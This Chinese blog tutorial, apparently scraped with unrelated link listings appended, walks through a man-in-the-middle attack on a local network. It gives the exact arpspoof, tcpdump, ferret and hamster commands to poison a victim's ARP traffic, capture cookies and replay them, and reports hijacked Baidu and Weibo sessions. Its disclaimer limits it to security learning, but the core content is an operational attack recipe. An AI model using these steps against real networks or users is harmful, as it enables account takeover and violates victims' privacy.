中间人攻击之劫持登录会话(cookies)
关于中间人攻击
中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。
因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。
视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws
注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用
关于抓取cookies的手记
要echo下,实现流量的转发,要不目标是上不了网的。
arpspoof 进行arp欺骗
首先抓取包wireshark:选择本地网卡eth0,star抓取流量。
这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。
用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp
重写之后生产hamster.txt
这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了
user。qonze你懂得
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗
tcpdump抓去打到本地的数据包
Ferret用来处理抓下来的数据包的
Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
0×01
拓扑环境:
攻击机:Kali 192.168.1.120

受害机:Windows7 192.168.1.100

网关:192.168.1.1
0×02
我的几个社区帐号都是登录状态,当然未登录也是可以劫持的



先看下我在Kali的机器上是未登录的



0×03
开始arp欺骗

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
捕获数据包

命令:tcpdump -i eth0 -w cookie.cap
0×05
模拟受害者登录
受害者在受害机器上就随便刷新一下或者登录一下
完毕
下面我们开始重点
0×06
处理抓去的数据包

ferret -r cookie.cap
自动生成了 hamster.txt

0×07
开启hamster服务

0×08
打开浏览器,使用代理
0×09
打开hamster 浏览器输入http://hamster

选择目标

0x0A
找敏感地址

0x0B
百度劫持成功

微博劫持成功

都成功了

0x0C
我在实验的时候碰见一个问题,就是突然上不到网
下面教大家解决
编辑/etc/NetworkManager/NetworkManager.conf

vi /etc/NetworkManager/NetworkManager.conf
改成true后保存

service network-manager restart
重启服务
中间人攻击之劫持登录会话(cookies)的更多相关文章
- 中间人攻击(MITM)姿势总结
相关学习资料 http://www.cnblogs.com/LittleHann/p/3733469.html http://www.cnblogs.com/LittleHann/p/3738141. ...
- 中间人攻击之ettercap嗅探
中间人攻击: 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的 ...
- MTIM(中间人攻击)
所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情. 信息篡改 当主机A.和主机B通信时,都由主机C来为其“转发”,如图一,而A.B之间并没有真正意思上的直 ...
- SSH V2的中间人攻击
SSH V2的中间人攻击 2012-12-19 10:48:52 我来说两句 作者:Dis9Team 收藏 我要投稿 中间人攻击(Man-in-the-MiddleAttack ...
- 中间人攻击 -- Cookie 喷发
0x00 前言 分享个中间人攻击姿势,屡试不爽. 原本是篇老文,不过写的太啰嗦.今天用简明的文字,重新讲一遍. 0x01 原理 传统 cookie 嗅探,只能获得用户主动访问的站点.不访问就抓不到,效 ...
- Android安全之Https中间人攻击漏洞
Android安全之Https中间人攻击漏洞 0X01 概述 HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. ...
- ARP欺骗与中间人攻击
前言: 上一篇WPA/WAP2wifi 密码破解笔记说到如何探测附近开放的AP并且破解进入,那么进入别人据局域网我们能干些什么呢?换句话说如果别人进入了我们内部网络,会有什么影响?本文简要介绍了ARP ...
- 中间人攻击之arp欺骗 科普ARP欺骗
中间人攻击之arp欺骗 科普ARP欺骗 A <-> B A中有个ARP Table,每次发包都会在此Table中查找,若找不到,发APR Request包询问.此时若hacker冒充B的M ...
- HTTPS中间人攻击实践(原理·实践)
前言 很早以前看过HTTPS的介绍,并了解过TLS的相关细节,也相信使用HTTPS是相对安全可靠的.直到前段时间在验证https代理通道连接时,搭建了MITM环境,才发现事实并不是我想的那样.由于 ...
随机推荐
- c#实现gzip压缩解压缩算法:byte[]字节数组,文件,字符串,数据流的压缩解压缩
转载:https://blog.csdn.net/luanpeng825485697/article/details/78165788 我测试了下压缩byte[],是可以的 using System; ...
- JavaScript技巧45招(转)
原文:45 Useful JavaScript Tips, Tricks and Best Practices作者:Saad Mousliki 在这篇文章里,我将分享一些JavaScript的技巧.秘 ...
- 安装并开启ssh服务
sudo yum install openssh* 安装 2. 设置 sudo vi /etc/ssh/sshd_config 首先先把port改掉port 52222 限制用户AllowUse ...
- NPOI excel文件解析
一.导入excel时要解析文件,我们直接用下面的帮助数来解析就可以了,开始是上使用该类的方法 private void ImportPlanPersonFromExcel(HttpContext co ...
- MySQL之存储引擎(表类型)的选择
和大部分的数据库不同,MySQL中有一个存储引擎的概念,用户可以根据数据存储的需求来选择不同的存储引擎.本次博客就来介绍一下MySQL中的存储引擎.MySQL版本 5.7.19. 概述 MySQL的存 ...
- 那些年的Java学习笔记
1.1L是什么意思??L表示long ,long占用8个字节,表示范围:-9223372036854775808 ~ 9223372036854775807 1l就是1. 2.alt+shift+j ...
- 查找CPU使用率过高的线程
1.在编写程序中有时候设置不恰当,休眠时间不够,一般情况下4核的电脑CPU使用率一直大于23%,8核的大于13%就有可能是这种情况 解决方法: 在VS查看并行线程利用CPU使用工具ProcessExp ...
- Effective C++ .07 virtual析构函数的提供
主要讲了, 1. virtual析构函数的作用与调用顺序 2. 使用时机,并不是使用了继承就要把基类的析构函数变为虚函数(virtual),只有当用于多态目的时才进行一个virtual析构函数的定义. ...
- after() 和 remove() 实现替换
<div class="replacedDiv">this is the replaced div</div> <script> ...
- 软件项目技术点(6)——结合鼠标操作绘制动态canvas画布
AxeSlide软件项目梳理 canvas绘图系列知识点整理 我们创建一个类封装了所有鼠标需要处理的事件. export class MouseEventInfo { el: HTMLElemen ...